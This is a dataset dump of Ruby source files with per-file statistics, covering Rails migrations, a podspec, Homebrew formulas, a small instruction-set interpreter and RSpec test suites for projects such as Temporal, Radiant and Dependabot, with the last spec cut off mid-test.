Column              Type      Min    Max
hexsha              string    40     40     (length in characters)
size                int64     2      1.01M
content             string    2      1.01M  (length in characters)
avg_line_length     float64   1.5    100
max_line_length     int64     2      1k
alphanum_fraction   float64   0.25   1
abd1fdc9ff215aa1d7929f80ceb4e4457b6ea421
176
class ChangeDataTypeForXboxpsn < ActiveRecord::Migration[6.1]
  def change
    change_column :songs, :xbox_link, :string
    change_column :songs, :psn_link, :string
  end
end
25.142857
61
0.75
1da22e1844d20dc715db4232a1afb5df9b891b5d
320
case ENV['RAILS_VERSION']
when '2.1' then gem 'activerecord', '~>2.1.0'
when '3.0' then gem 'activerecord', '~>3.0.0'
else gem 'activerecord', '~>2.3.0'
end

require 'active_record'
require 'active_record/version'

puts "Running specs using Rails #{ActiveRecord::VERSION::STRING}"

require 'acceptance/models'
18.823529
65
0.69375
0820a436c60cc26c679b4022876b277353666bc0
35
module HPI
  VERSION = '0.1.0'
end
8.75
19
0.628571
ab04c9ca0eac7181e0b466476bdb152739246c46
608
require_relative 'boot'

# Pick the frameworks you want:
# require "active_record/railtie"
require "action_controller/railtie"
require "action_view/railtie"
# require "action_mailer/railtie"
# require "rails/test_unit/railtie"
require "sprockets/railtie"

Bundler.require(*Rails.groups)
require "shiftcommerce-rails"

module Dummy
  class Application < Rails::Application
    # Settings in config/environments/* take precedence over those specified here.
    # Application configuration should go into files in config/initializers
    # -- all .rb files in that directory are automatically loaded.
  end
end
28.952381
82
0.782895
0146bfe938f87988b80cce605ab95d62619e8bda
188
require File.expand_path('../shared/constants', __FILE__)
require File.expand_path('../shared/update', __FILE__)

describe "Digest::SHA384#<<" do
  it_behaves_like(:sha384_update, :<<)
end
26.857143
57
0.744681
017a4b5b90770974661331fd70ccdfe61a8346ae
1,226
Pod::Spec.new do |s|
  s.name         = "GEOSwift"
  s.version      = "0.5.1"
  s.summary      = "The Swift Geographic Engine."
  s.description  = <<-DESC
                   Easily handle a geographical object model (points, linestrings, polygons etc.) and related topographical operations (intersections, overlapping etc.).
                   A type-safe, MIT-licensed Swift interface to the OSGeo's GEOS library routines, nicely integrated with MapKit and Quicklook.
                   DESC
  s.homepage     = "https://github.com/andreacremaschi/GEOSwift"
  # s.screenshots  = "www.example.com/screenshots_1.gif", "www.example.com/screenshots_2.gif"

  s.license      = { :type => "MIT", :file => "LICENSE" }
  s.author       = { "Andrea Cremaschi" => "[email protected]" }
  s.social_media_url = "http://twitter.com/andreacremaschi"

  s.platform     = :ios, "8.0"
  s.source       = { :git => "https://github.com/andreacremaschi/GEOSwift.git", :tag => "0.5.1" }

  s.subspec 'Core' do |cs|
    cs.source_files = "GEOSwift/*"
    cs.dependency "geos", "3.5.0"
  end

  # Mapbox support
  s.subspec 'MapboxGL' do |cs|
    cs.source_files = "GEOSwift/MapboxGL"
    cs.dependency "GEOSwift/Core"
    cs.dependency "Mapbox-iOS-SDK"
  end

  s.default_subspec = 'Core'
end
35.028571
150
0.664763
7a3300ec1d20bd70597acacea054e7da9e547cd1
1,797
class Dosfstools < Formula
  desc "Tools to create, check and label file systems of the FAT family"
  homepage "https://github.com/dosfstools"
  url "https://github.com/dosfstools/dosfstools/releases/download/v4.2/dosfstools-4.2.tar.gz"
  sha256 "64926eebf90092dca21b14259a5301b7b98e7b1943e8a201c7d726084809b527"
  license "GPL-3.0-or-later"
  head "https://github.com/dosfstools/dosfstools.git"

  bottle do
    sha256 cellar: :any_skip_relocation, big_sur:       "c4f450bef47449fa57d911e1c3610cd65bf8d7fd661e3efc8a0a44c7d45510f5"
    sha256 cellar: :any_skip_relocation, arm64_big_sur: "3d8437b8921385c7675d2502c0c7b746f060e6b1656923e061173d568927f34d"
    sha256 cellar: :any_skip_relocation, catalina:      "df9afee3d6ec3da028a6fdd487b98800099f8aa248261c35ed2821e984b91a70"
    sha256 cellar: :any_skip_relocation, mojave:        "4d910d3f83352692379e5ead97f3c52ab845cc187a1d791f655ed02ef7b7b9e6"
  end

  depends_on "autoconf" => :build
  depends_on "automake" => :build
  depends_on "gettext" => :build
  depends_on "pkg-config" => :build

  # remove in next release
  # https://github.com/dosfstools/dosfstools/pull/158
  patch do
    url "https://github.com/dosfstools/dosfstools/commit/8a917ed2afb2dd2a165a93812b6f52b9060eec5f.patch?full_index=1"
    sha256 "73019e3f7852158bfe47a0105eb605b4df4a10ca50befc02adf50aed11bd4445"
  end

  def install
    system "autoreconf", "-fiv"
    system "./configure", "--prefix=#{prefix}", "--without-udev", "--enable-compat-symlinks"
    system "make", "install"
  end

  test do
    system "dd", "if=/dev/zero", "of=test.bin", "bs=512", "count=1024"
    system "#{sbin}/mkfs.fat", "test.bin", "-n", "HOMEBREW", "-v"
    system "#{sbin}/fatlabel", "test.bin"
    system "#{sbin}/fsck.fat", "-v", "test.bin"
  end
end
41.790698
122
0.729549
33d59e33c1af8ce9b1561706d348034e210101f0
156
class AddOmniauthToUsers < ActiveRecord::Migration[5.2]
  def change
    add_column :users, :name, :string
    add_column :users, :uid, :text
  end
end
19.5
55
0.692308
1af560b0c19949b08fbd2f38f430de190d04a6b0
1,435
class SoundProcessingUnit
  def initialize
    @instructions = []
    @program_counter = 0
    @register_file = Hash.new(0)
    @current_sound = 0
    @running = true
  end

  def get_value(arg)
    if /([a-z]+)/.match? arg
      @register_file[arg]
    else
      arg.to_i
    end
  end

  def exec(cmd, arg1, arg2)
    v = get_value(arg2) unless arg2.nil?
    case cmd
    when 'snd'
      @current_sound = get_value(arg1)
    when 'set'
      @register_file[arg1] = v
    when 'add'
      @register_file[arg1] += v
    when 'mul'
      @register_file[arg1] *= v
    when 'mod'
      @register_file[arg1] %= v
    when 'rcv'
      if get_value(arg1) != 0
        print "Recovered #{@current_sound}\n"
        @running = false
      end
    when 'jgz'
      if get_value(arg1) > 0
        @program_counter += get_value(arg2)
        return
      end
    end
    @program_counter += 1
  end

  def fetch_instruction
    @instructions[@program_counter]
  end

  def step
    op = fetch_instruction
    # Instructions are stored as hashes by #compile, so read them with hash keys.
    exec(op[:op], op[:a], op[:b])
  end

  def run
    step while @running
  end

  def compile(filename)
    File.open(filename, "r").read.each_line do |line|
      parts = line.split(" ")
      @instructions.push(op: parts[0], a: parts[1], b: parts.length > 2 ? parts[2] : nil)
    end
  end
end

vm = SoundProcessingUnit.new
vm.compile(ARGV[0])
vm.run
17.9375
91
0.576307
ac3cd2418e211766b27798688eb27f756f735789
5,170
# This file was generated by the `rails generate rspec:install` command. Conventionally, all # specs live under a `spec` directory, which RSpec adds to the `$LOAD_PATH`. # The generated `.rspec` file contains `--require spec_helper` which will cause # this file to always be loaded, without a need to explicitly require it in any # files. # # Given that it is always loaded, you are encouraged to keep this file as # light-weight as possible. Requiring heavyweight dependencies from this file # will add to the boot time of your test suite on EVERY test run, even for an # individual file that may not need all of that loaded. Instead, consider making # a separate helper file that requires the additional dependencies and performs # the additional setup, and require it from the spec files that actually need # it. # # The `.rspec` file also contains a few flags that are not defaults but that # users commonly want. # # See http://rubydoc.info/gems/rspec-core/RSpec/Core/Configuration require 'coveralls' Coveralls.wear! RSpec.configure do |config| # rspec-expectations config goes here. You can use an alternate # assertion/expectation library such as wrong or the stdlib/minitest # assertions if you prefer. config.expect_with :rspec do |expectations| # This option will default to `true` in RSpec 4. It makes the `description` # and `failure_message` of custom matchers include text for helper methods # defined using `chain`, e.g.: # be_bigger_than(2).and_smaller_than(4).description # # => "be bigger than 2 and smaller than 4" # ...rather than: # # => "be bigger than 2" expectations.include_chain_clauses_in_custom_matcher_descriptions = true end # rspec-mocks config goes here. You can use an alternate test double # library (such as bogus or mocha) by changing the `mock_with` option here. config.mock_with :rspec do |mocks| # Prevents you from mocking or stubbing a method that does not exist on # a real object. This is generally recommended, and will default to # `true` in RSpec 4. mocks.verify_partial_doubles = true end # This option will default to `:apply_to_host_groups` in RSpec 4 (and will # have no way to turn it off -- the option exists only for backwards # compatibility in RSpec 3). It causes shared context metadata to be # inherited by the metadata hash of host groups and examples, rather than # triggering implicit auto-inclusion in groups with matching metadata. config.shared_context_metadata_behavior = :apply_to_host_groups # The settings below are suggested to provide a good initial experience # with RSpec, but feel free to customize to your heart's content. # # This allows you to limit a spec run to individual examples or groups # # you care about by tagging them with `:focus` metadata. When nothing # # is tagged with `:focus`, all examples get run. RSpec also provides # # aliases for `it`, `describe`, and `context` that include `:focus` # # metadata: `fit`, `fdescribe` and `fcontext`, respectively. # config.filter_run_when_matching :focus # # # Allows RSpec to persist some state between runs in order to support # # the `--only-failures` and `--next-failure` CLI options. We recommend # # you configure your source control system to ignore this file. # config.example_status_persistence_file_path = "spec/examples.txt" # # # Limits the available syntax to the non-monkey patched syntax that is # # recommended. 
For more details, see: # # - http://rspec.info/blog/2012/06/rspecs-new-expectation-syntax/ # # - http://www.teaisaweso.me/blog/2013/05/27/rspecs-new-message-expectation-syntax/ # # - http://rspec.info/blog/2014/05/notable-changes-in-rspec-3/#zero-monkey-patching-mode # config.disable_monkey_patching! # # # Many RSpec users commonly either run the entire suite or an individual # # file, and it's useful to allow more verbose output when running an # # individual spec file. # if config.files_to_run.one? # # Use the documentation formatter for detailed output, # # unless a formatter has already been configured # # (e.g. via a command-line flag). # config.default_formatter = 'doc' # end # # # Print the 10 slowest examples and example groups at the # # end of the spec run, to help surface which specs are running # # particularly slow. # config.profile_examples = 10 # # # Run specs in random order to surface order dependencies. If you find an # # order dependency and want to debug it, you can fix the order by providing # # the seed, which is printed after each run. # # --seed 1234 # config.order = :random # # # Seed global randomization in this process using the `--seed` CLI option. # # Setting this allows you to use `--seed` to deterministically reproduce # # test failures related to randomization by passing the same `--seed` value # # as the one that triggered the failure. # Kernel.srand config.seed config.before(:each, type: :feature) do default_url_options[:locale] = I18n.default_locale end end
49.238095
96
0.717988
ffb492e3761a4962440bef97d53881373ebfce1d
1,864
require 'rails_helper'

describe Friendship do
  describe '#create_friendship' do
    it 'this will create a new friendship' do
      user1 = User.create!(email: '[email protected]', name: 'tesdfqwt1',
                           gravatar_url: 'http://www.gravfatar.com/avatar/%22', password: '1231e23')
      user2 = User.create!(email: '[email protected]', name: 'tfgest2',
                           gravatar_url: 'http://www.gravgatar.com/avatar/%22', password: '1231fgdqw23')
      f = Friendship.create!(creator_id: user1.id, receiver_id: user2.id, status: false)
      expect(Friendship.find(f.id).id).to eql(Friendship.last.id)
    end
  end

  describe '#accept_friendship' do
    it 'This will accept a friendship' do
      user1 = User.create!(email: '[email protected]', name: 'tefdgsqt1',
                           gravatar_url: 'http://www.gwqrghavatar.com/avatar/%22', password: '123123')
      user2 = User.create!(email: '[email protected]', name: 'tewqiost2',
                           gravatar_url: 'http://wwwkl.gravatar.com/avatar/%22', password: '123o123')
      f = Friendship.create(creator_id: user1.id, receiver_id: user2.id, status: false)
      f.update(status: true)
      expect(Friendship.find(f.id).id).to eql(Friendship.last.id)
    end
  end

  describe '#reject_friendship' do
    it 'This will reject a frienship' do
      user1 = User.create!(email: '[email protected]', name: 'tedofst1',
                           gravatar_url: 'http:/a/wwwi.gravatar.com/avatar/%22', password: 'p1231psd23')
      user2 = User.create!(email: '[email protected]', name: 'satuest2',
                           gravatar_url: 'http://wwsw.igravatar.com/avatar/%22', password: '1231o23')
      f = Friendship.create!(creator_id: user1.id, receiver_id: user2.id, status: false)
      expect(f.destroy!).to eql(f)
    end
  end
end
45.463415
130
0.633047
aba693cceece533f3483f72681de75e3fe52398a
181
# Copyright (c) 2013 Universidade Federal Fluminense (UFF).
# This file is part of SAPOS. Please, consult the license terms in the LICENSE file.

module EnrollmentStatusesHelper
end
36.2
84
0.79558
1dfc28ef04896b2cc0e348d2120cab4fc448f902
5,035
require File.dirname(__FILE__) + '/../../../spec_helper' describe Radiant::AdminUI::NavTab do before :each do @tab = Radiant::AdminUI::NavTab.new(:content, "Content") end it "should have a name" do @tab.name.should == :content end it "should have a proper name" do @tab.proper_name.should == "Content" end it "should be Enumerable" do Enumerable.should === @tab @tab.should respond_to(:each) end it "should find contained items by name" do subtab = Radiant::AdminUI::NavTab.new(:pages, "Pages") @tab << subtab @tab[:pages].should == subtab @tab['pages'].should == subtab end it "should assign the tab on the sub-item when adding" do subtab = Radiant::AdminUI::NavSubItem.new(:pages, "Pages", "/admin/pages") @tab << subtab subtab.tab.should == @tab end describe "inserting sub-items in specific places" do before :each do @pages = Radiant::AdminUI::NavSubItem.new(:pages, "Pages", "/admin/pages") @snippets = Radiant::AdminUI::NavSubItem.new(:snippets, "Snippets", "/admin/snippets") @comments = Radiant::AdminUI::NavSubItem.new(:comments, "Comments", "/admin/comments") @tab << @pages @tab << @snippets end it "should insert at the end by default" do @tab << @comments @tab.last.should == @comments end it "should insert before the specified sub-item" do @tab.add(@comments, :before => :snippets) @tab[1].should == @comments end it "should insert after the specified sub-item" do @tab.add(@comments, :after => :pages) @tab[1].should == @comments end it "should raise an error if a sub-item of the same name already exists" do @tab << @comments lambda { @tab << @comments.dup }.should raise_error(Radiant::AdminUI::DuplicateTabNameError) end end describe "visibility" do dataset :users it "should be visible by default" do User.all.each {|user| @tab.should be_visible(user) } end it "should restrict to a specific role" do @tab.visibility.replace [:designer] @tab.should be_visible(users(:designer)) @tab.should_not be_visible(users(:admin)) @tab.should_not be_visible(users(:existing)) end it "should restrict to a group of roles" do @tab.visibility.replace [:designer, :admin] @tab.should be_visible(users(:designer)) @tab.should be_visible(users(:admin)) @tab.should_not be_visible(users(:existing)) end end it "should warn about using the deprecated add method" do ActiveSupport::Deprecation.should_receive(:warn) @tab.add("Pages", "/admin/pages") @tab[:pages].proper_name.should == "Pages" @tab[:pages].url.should == "/admin/pages" end end describe Radiant::AdminUI::NavSubItem do before :each do @tab = Radiant::AdminUI::NavTab.new(:content, "Content") @subitem = Radiant::AdminUI::NavSubItem.new(:pages, "Pages", "/admin/pages") @tab << @subitem end it "should have a name" do @subitem.name.should == :pages end it "should have a proper name" do @subitem.proper_name.should == "Pages" end it "should have a URL" do @subitem.url.should == "/admin/pages" end describe "generating a relative url" do it "should return the original url when no relative_url_root is set" do @subitem.relative_url.should == "/admin/pages" end it "should make the url relative to the relative_url_root when set" do ActionController::Base.relative_url_root = '/radiant' @subitem.relative_url.should == "/radiant/admin/pages" end after :each do ActionController::Base.relative_url_root = nil end end it "should have a tab accessor" do @subitem.should respond_to(:tab) @subitem.should respond_to(:tab=) @subitem.tab.should == @tab end describe "visibility" do dataset :users before :each do @controller = Admin::UsersController.new 
Admin::UsersController.stub!(:new).and_return(@controller) end it "should check the visibility against the controller permissions" do User.all.each {|user| @subitem.should be_visible(user) } end it "should not be visible when the parent tab is not visible to the user" do @tab.visibility.replace [:admin] @subitem.should_not be_visible(users(:designer)) @subitem.should_not be_visible(users(:existing)) end describe "when the controller limits access to the action" do before :each do @subitem.url.sub!('pages', 'users') end it "should not be visible if the user lacks access" do @controller.stub!(:current_user).and_return(users(:existing)) @subitem.should_not be_visible(users(:existing)) end it "should be visible if the user has access" do @controller.stub!(:current_user).and_return(users(:admin)) @subitem.should be_visible(users(:admin)) end end end end
30.149701
98
0.649851
acb12bae3af68e27437a870e3b25d8f239b9ca8c
95
module Biovision
  module Comment
    class ApplicationJob < ActiveJob::Base
    end
  end
end
13.571429
42
0.726316
b953f4d55aa3339ba1f74e85ca323cc3aef7ddc6
1,669
#
# Author:: Davide Cavalca <[email protected]>
# Copyright:: Copyright (c) 2016 Facebook
# License:: Apache License, Version 2.0
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
#     http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#

require "spec_helper"

describe Ohai::System, "Machine id plugin" do
  let(:plugin) { get_plugin("linux/machineid") }

  before(:each) do
    allow(plugin).to receive(:collect_os).and_return(:linux)
  end

  it "should read /etc/machine-id if available" do
    machine_id = "6f702523e2fc7499eb1dc68e5314dacf"

    allow(::File).to receive(:exist?).with("/etc/machine-id").and_return(true)
    allow(::File).to receive(:read).with("/etc/machine-id").and_return(machine_id)

    plugin.run

    expect(plugin[:machine_id]).to eq(machine_id)
  end

  it "should read /var/lib/dbus/machine-id if available" do
    machine_id = "6f702523e2fc7499eb1dc68e5314dacf"

    allow(::File).to receive(:exist?).with("/etc/machine-id").and_return(false)
    allow(::File).to receive(:exist?).with("/var/lib/dbus/machine-id").and_return(true)
    allow(::File).to receive(:read).with("/var/lib/dbus/machine-id").and_return(machine_id)

    plugin.run

    expect(plugin[:machine_id]).to eq(machine_id)
  end
end
35.510638
91
0.723787
91e1eccf9dd2721871216d7b806ad0c689db1777
7,953
require 'temporal/activity/task_processor' require 'temporal/middleware/chain' require 'temporal/configuration' describe Temporal::Activity::TaskProcessor do subject { described_class.new(task, namespace, lookup, middleware_chain, config) } let(:namespace) { 'test-namespace' } let(:lookup) { instance_double('Temporal::ExecutableLookup', find: nil) } let(:task) do Fabricate( :api_activity_task, activity_name: activity_name, input: Temporal.configuration.converter.to_payloads(input) ) end let(:metadata) { Temporal::Metadata.generate(Temporal::Metadata::ACTIVITY_TYPE, task) } let(:activity_name) { 'TestActivity' } let(:connection) { instance_double('Temporal::Connection::GRPC') } let(:middleware_chain) { Temporal::Middleware::Chain.new } let(:config) { Temporal::Configuration.new } let(:input) { ['arg1', 'arg2'] } describe '#process' do let(:context) { instance_double('Temporal::Activity::Context', async?: false) } before do allow(Temporal::Connection) .to receive(:generate) .with(config.for_connection) .and_return(connection) allow(Temporal::Metadata) .to receive(:generate) .with(Temporal::Metadata::ACTIVITY_TYPE, task, namespace) .and_return(metadata) allow(Temporal::Activity::Context).to receive(:new).with(connection, metadata).and_return(context) allow(connection).to receive(:respond_activity_task_completed) allow(connection).to receive(:respond_activity_task_failed) allow(middleware_chain).to receive(:invoke).and_call_original allow(Temporal.metrics).to receive(:timing) # Skip sleeps during retries to speed up the test. allow(Temporal::Connection::Retryer).to receive(:sleep).and_return(nil) end context 'when activity is not registered' do it 'fails the activity task' do subject.process expect(connection) .to have_received(:respond_activity_task_failed) .with( task_token: task.task_token, exception: an_instance_of(Temporal::ActivityNotRegistered) ) end it 'ignores connection exception' do allow(connection) .to receive(:respond_activity_task_failed) .and_raise(StandardError) subject.process end it 'calls error_handlers' do reported_error = nil reported_metadata = nil Temporal.configuration.on_error do |error, metadata: nil| reported_error = error reported_metadata = metadata.to_h end subject.process expect(reported_error).to be_an_instance_of(Temporal::ActivityNotRegistered) expect(reported_metadata).to_not be_empty end end context 'when activity is registered' do let(:activity_class) { double('Temporal::Activity', execute_in_context: nil) } before do allow(lookup).to receive(:find).with(activity_name).and_return(activity_class) end context 'when activity completes' do before { allow(activity_class).to receive(:execute_in_context).and_return('result') } it 'runs the specified activity' do subject.process expect(activity_class).to have_received(:execute_in_context).with(context, input) end it 'invokes the middleware chain' do subject.process expect(middleware_chain).to have_received(:invoke).with(metadata) end it 'completes the activity task' do subject.process expect(connection) .to have_received(:respond_activity_task_completed) .with(task_token: task.task_token, result: 'result') end it 'ignores connection exception' do allow(connection) .to receive(:respond_activity_task_completed) .and_raise(StandardError) subject.process end it 'sends queue_time metric' do subject.process expect(Temporal.metrics) .to have_received(:timing) .with('activity_task.queue_time', an_instance_of(Integer), activity: activity_name) end it 'sends latency metric' do subject.process expect(Temporal.metrics) .to 
have_received(:timing) .with('activity_task.latency', an_instance_of(Integer), activity: activity_name) end context 'with async activity' do before { allow(context).to receive(:async?).and_return(true) } it 'does not complete the activity task' do subject.process expect(connection).not_to have_received(:respond_activity_task_completed) end end end context 'when activity raises an exception' do let(:exception) { StandardError.new('activity failed') } before { allow(activity_class).to receive(:execute_in_context).and_raise(exception) } it 'runs the specified activity' do subject.process expect(activity_class).to have_received(:execute_in_context).with(context, input) end it 'invokes the middleware chain' do subject.process expect(middleware_chain).to have_received(:invoke).with(metadata) end it 'fails the activity task' do subject.process expect(connection) .to have_received(:respond_activity_task_failed) .with( task_token: task.task_token, exception: exception ) end it 'ignores connection exception' do allow(connection) .to receive(:respond_activity_task_failed) .and_raise(StandardError) subject.process end it 'calls error_handlers' do reported_error = nil reported_metadata = nil Temporal.configuration.on_error do |error, metadata: nil| reported_error = error reported_metadata = metadata end subject.process expect(reported_error).to be_an_instance_of(StandardError) expect(reported_metadata).to be_an_instance_of(Temporal::Metadata::Activity) end it 'sends queue_time metric' do subject.process expect(Temporal.metrics) .to have_received(:timing) .with('activity_task.queue_time', an_instance_of(Integer), activity: activity_name) end it 'sends latency metric' do subject.process expect(Temporal.metrics) .to have_received(:timing) .with('activity_task.latency', an_instance_of(Integer), activity: activity_name) end context 'with ScriptError exception' do let(:exception) { NotImplementedError.new('this was not supposed to be called') } it 'fails the activity task' do subject.process expect(connection) .to have_received(:respond_activity_task_failed) .with( task_token: task.task_token, exception: exception ) end end context 'with SystemExit exception' do let(:exception) { SystemExit.new('Houston, we have a problem') } it 'does not handle the exception' do expect { subject.process }.to raise_error(exception) expect(connection).not_to have_received(:respond_activity_task_failed) end end context 'with async activity' do before { allow(context).to receive(:async?).and_return(true) } it 'fails the activity task' do subject.process expect(connection) .to have_received(:respond_activity_task_failed) .with(task_token: task.task_token, exception: exception) end end end end end end
30.945525
104
0.636364
3885b1857a470425f64c5f15d1e436e1254c4c00
1,270
require_relative '../automated_init'

context "Data Command" do
  context "Insert Email Rejected" do
    registration_id = Controls::Registration.id
    user_id = Controls::User.id
    email_address = Controls::Registration.email_address
    time = Controls::Time::Effective.example

    insert_email_rejected = DataCommand::InsertEmailRejected.new

    insert_email_rejected.(
      registration_id: registration_id,
      user_id: user_id,
      email_address: email_address,
      time: time
    )

    insert = insert_email_rejected.insert

    test "Insert matches name" do
      inserted = insert.inserted? do |name|
        name == "registrations"
      end

      assert(inserted)
    end

    test "Insert matches identifier" do
      inserted = insert.inserted? do |_, identifier|
        identifier == { :registration_id => registration_id }
      end

      assert(inserted)
    end

    test "Insert matches data" do
      registration_data = {
        :user_id => user_id,
        :email_address => email_address,
        :is_email_rejected => true,
        :is_registered => false,
        :created_at => time
      }

      inserted = insert.inserted? do |_, _, data|
        data == registration_data
      end

      assert(inserted)
    end
  end
end
23.518519
64
0.647244
bb546977e5b8e423737599934f8ab6628aea75b7
260
class Appointment < ApplicationRecord
  belongs_to :day

  validates :time, :client, :barber, presence: true
  validates :client, :barber, length: {maximum: 10}
  validates_uniqueness_of :barber, :case_sensitive => false, :scope => [:time, :day_id]
end
37.142857
89
0.711538
8747fb1c46b15aac79d88943c2e0a4f80d94421d
594
require 'similar_users'

RSpec.describe SimilarUsers do
  before :all do
    user = User.find_user(35_914) # user item_ids = [1253, 1532, 1298, 1314, 1366]
    similar_users = [
      User.find_user(143_554), # item_ids = [1253, 1301]
      User.find_user(158_241)  # item_ids = [1298]
    ]
    @recommender = SimilarUsers.new(user, similar_users)
  end

  describe '.recommend_items' do
    it 'should recommend item from other users with similar purchases' do
      expected = Set.new [Item.find_item(1301)]
      expect(@recommender.recommend_items).to eq(expected)
    end
  end
end
25.826087
73
0.683502
2800f70831c86421bd3776d51e63d1d6c485e9f1
661
# frozen_string_literal: true

require_relative "../connectors/aoc_connector"
require_relative "../helpers/password_checker"

# Day 2 solver
class PasswordListParser
  def solve
    puts "part1: #{count_valid_passwords(strategy: "inclusion")}"
    puts "part2: #{count_valid_passwords(strategy: "presence")}"
  end

  private

  def count_valid_passwords(strategy:)
    ::Connectors::AocConnector.new(endpoint: "day_2_input")
                              .parse_data
                              .map { |raw_password| PasswordChecker.new(raw_password, strategy) }
                              .select(&:valid?)
                              .count
  end
end
28.73913
97
0.617247
e2a36ce2845100b7d2cfbc8e24ed49198d5aa592
202
$LOAD_PATH.unshift File.expand_path('../../lib', __FILE__)
require 'organ_cooker'

require 'minitest/autorun'
require 'minitest/reporters'

Minitest::Reporters.use! Minitest::Reporters::SpecReporter.new
28.857143
62
0.787129
e802a3529ea0c058f6303fa8893aa758622efdc4
1,489
class Squashfuse < Formula
  desc "FUSE filesystem to mount squashfs archives"
  homepage "https://github.com/vasi/squashfuse"
  url "https://github.com/vasi/squashfuse/releases/download/0.1.103/squashfuse-0.1.103.tar.gz"
  sha256 "42d4dfd17ed186745117cfd427023eb81effff3832bab09067823492b6b982e7"
  license "BSD-2-Clause"

  bottle do
    cellar :any
    sha256 "7e2e0499c0b9f98beb398319c949d2a1d45de6a3f0b546ef1d55214f68522312" => :catalina
    sha256 "f4cb4305f7773fbf927d51a401453c3cdee1f1d48da2ef33d8fd41d526fa7c0d" => :mojave
    sha256 "ada7e939ff42fcd9fb6b1fb81ab596463d6149ff592f73ca924b5b9dca5ddfc4" => :high_sierra
    sha256 "c1898c81ae091097ae2502ecbdebdd1831db302dd74b814003191007a4d5f018" => :sierra
    sha256 "bf4e6ca88d094fd7d92fbab61dd1c3a4e71b60d7668d23b6044c90e8167833c5" => :el_capitan
  end

  deprecate! date: "2020-11-10", because: "requires FUSE"

  depends_on "pkg-config" => :build
  depends_on "lz4"
  depends_on "lzo"
  depends_on :osxfuse
  depends_on "squashfs"
  depends_on "xz"
  depends_on "zstd"

  def install
    system "./configure", "--disable-dependency-tracking",
                          "--disable-silent-rules",
                          "--prefix=#{prefix}"
    system "make", "install"
  end

  # Unfortunately, making/testing a squash mount requires sudo privileges, so
  # just test that squashfuse execs for now.
  test do
    output = shell_output("#{bin}/squashfuse --version 2>&1", 254)
    assert_match version.to_s, output
  end
end
36.317073
94
0.738079
1850725a9e83342ada2ca84144f2d4583414fb8f
810
require File.dirname(__FILE__) + "/gruff_test_case"

class TestMiniBar < GruffTestCase
  def test_simple_bar
    setup_single_dataset
    g = setup_basic_graph(Gruff::Mini::Bar, 200)
    write_test_file g, 'mini_bar.png'
  end

  # def test_simple_bar_wide_dataset
  #   setup_wide_dataset
  #   g = setup_basic_graph(Gruff::Mini::Bar, 200)
  #   write_test_file g, 'mini_bar_wide_data.png'
  # end
  #
  # def test_code_sample
  #   g = Gruff::Mini::Bar.new(200)
  #   g.data "Jim", [200, 500, 400]
  #   g.labels = { 0 => 'This Month', 1 => 'Average', 2 => 'Overall'}
  #   g.write "mini_bar_one_color.png"
  #
  #   g = Gruff::Mini::Bar.new(200)
  #   g.data "Car", 200
  #   g.data "Food", 500
  #   g.data "Art", 1000
  #   g.data "Music", 16
  #   g.write "mini_bar_many_colors.png"
  # end
end
24.545455
69
0.628395
87ac3437ec33ded10a9842ae745c7a938b4a5316
661
class Complement
  DNA_PAIRINGS = { 'G' => 'C', 'C' => 'G', 'A' => 'U', 'T' => 'A' }.freeze
  RNA_PAIRINGS = { 'G' => 'C', 'C' => 'G', 'A' => 'T', 'U' => 'A' }.freeze

  def self.of_dna(strand)
    raise ArgumentError if strand.include?('U')

    strand.chars.map { |nucleobase| dna_pairing_for(nucleobase) }.join
  end

  def self.of_rna(strand)
    raise ArgumentError if strand.include?('T')

    strand.chars.map { |nucleobase| rna_pairing_for(nucleobase) }.join
  end

  def self.dna_pairing_for(nucleobase)
    DNA_PAIRINGS[nucleobase]
  end

  def self.rna_pairing_for(nucleobase)
    RNA_PAIRINGS[nucleobase]
  end
end
20.030303
70
0.608169
0386bea72ad4f981b20fd5f9157d64956b5785c6
29,082
# frozen_string_literal: true require "octokit" require "spec_helper" require "dependabot/dependency" require "dependabot/source" require "dependabot/metadata_finders/base/commits_finder" RSpec.describe Dependabot::MetadataFinders::Base::CommitsFinder do subject(:builder) do described_class.new( dependency: dependency, credentials: credentials, source: source ) end let(:dependency) do Dependabot::Dependency.new( name: dependency_name, version: dependency_version, requirements: dependency_requirements, previous_requirements: dependency_previous_requirements, previous_version: dependency_previous_version, package_manager: package_manager ) end let(:package_manager) { "dummy" } let(:dependency_name) { "business" } let(:dependency_version) { "1.4.0" } let(:dependency_requirements) do [{ file: "Gemfile", requirement: ">= 0", groups: [], source: nil }] end let(:dependency_previous_requirements) do [{ file: "Gemfile", requirement: ">= 0", groups: [], source: nil }] end let(:dependency_previous_version) { "1.0.0" } let(:credentials) do [{ "type" => "git_source", "host" => "github.com", "username" => "x-access-token", "password" => "token" }] end let(:source) do Dependabot::Source.new( provider: "github", repo: "gocardless/#{dependency_name}" ) end before do stub_request(:get, service_pack_url). to_return( status: 200, body: fixture("git", "upload_packs", upload_pack_fixture), headers: { "content-type" => "application/x-git-upload-pack-advertisement" } ) end let(:service_pack_url) do "https://github.com/gocardless/business.git/info/refs"\ "?service=git-upload-pack" end let(:upload_pack_fixture) { "business" } describe "#commits_url" do subject(:commits_url) { builder.commits_url } context "with a github repo and old/new tags" do let(:dependency_previous_version) { "1.3.0" } let(:upload_pack_fixture) { "business" } it do is_expected.to eq("https://github.com/gocardless/business/"\ "compare/v1.3.0...v1.4.0") end context "without a previous version" do let(:dependency_requirements) do [{ file: "Gemfile", requirement: "~> 1.4.0", groups: [], source: nil }] end let(:dependency_previous_requirements) do [{ file: "Gemfile", requirement: "~> 1.3.0", groups: [], source: nil }] end let(:dependency_previous_version) { nil } it do is_expected.to eq("https://github.com/gocardless/business/"\ "compare/v1.3.0...v1.4.0") end end end context "with a github repo and only a new tag" do let(:dependency_previous_version) { "0.1.0" } let(:upload_pack_fixture) { "business" } it do is_expected. to eq("https://github.com/gocardless/business/commits/v1.4.0") end context "and a directory" do before { source.directory = "my/directory" } it "doesn't include the directory (since it is unreliable)" do expect(commits_url). to eq("https://github.com/gocardless/business/commits/v1.4.0") end context "for a package manager with reliable source directories" do before do allow(builder). to receive(:reliable_source_directory?). and_return(true) end it "includes the directory" do expect(commits_url). to eq( "https://github.com/gocardless/business/commits/"\ "v1.4.0/my/directory" ) end context "when the directory starts with ./" do before { source.directory = "./my/directory" } it 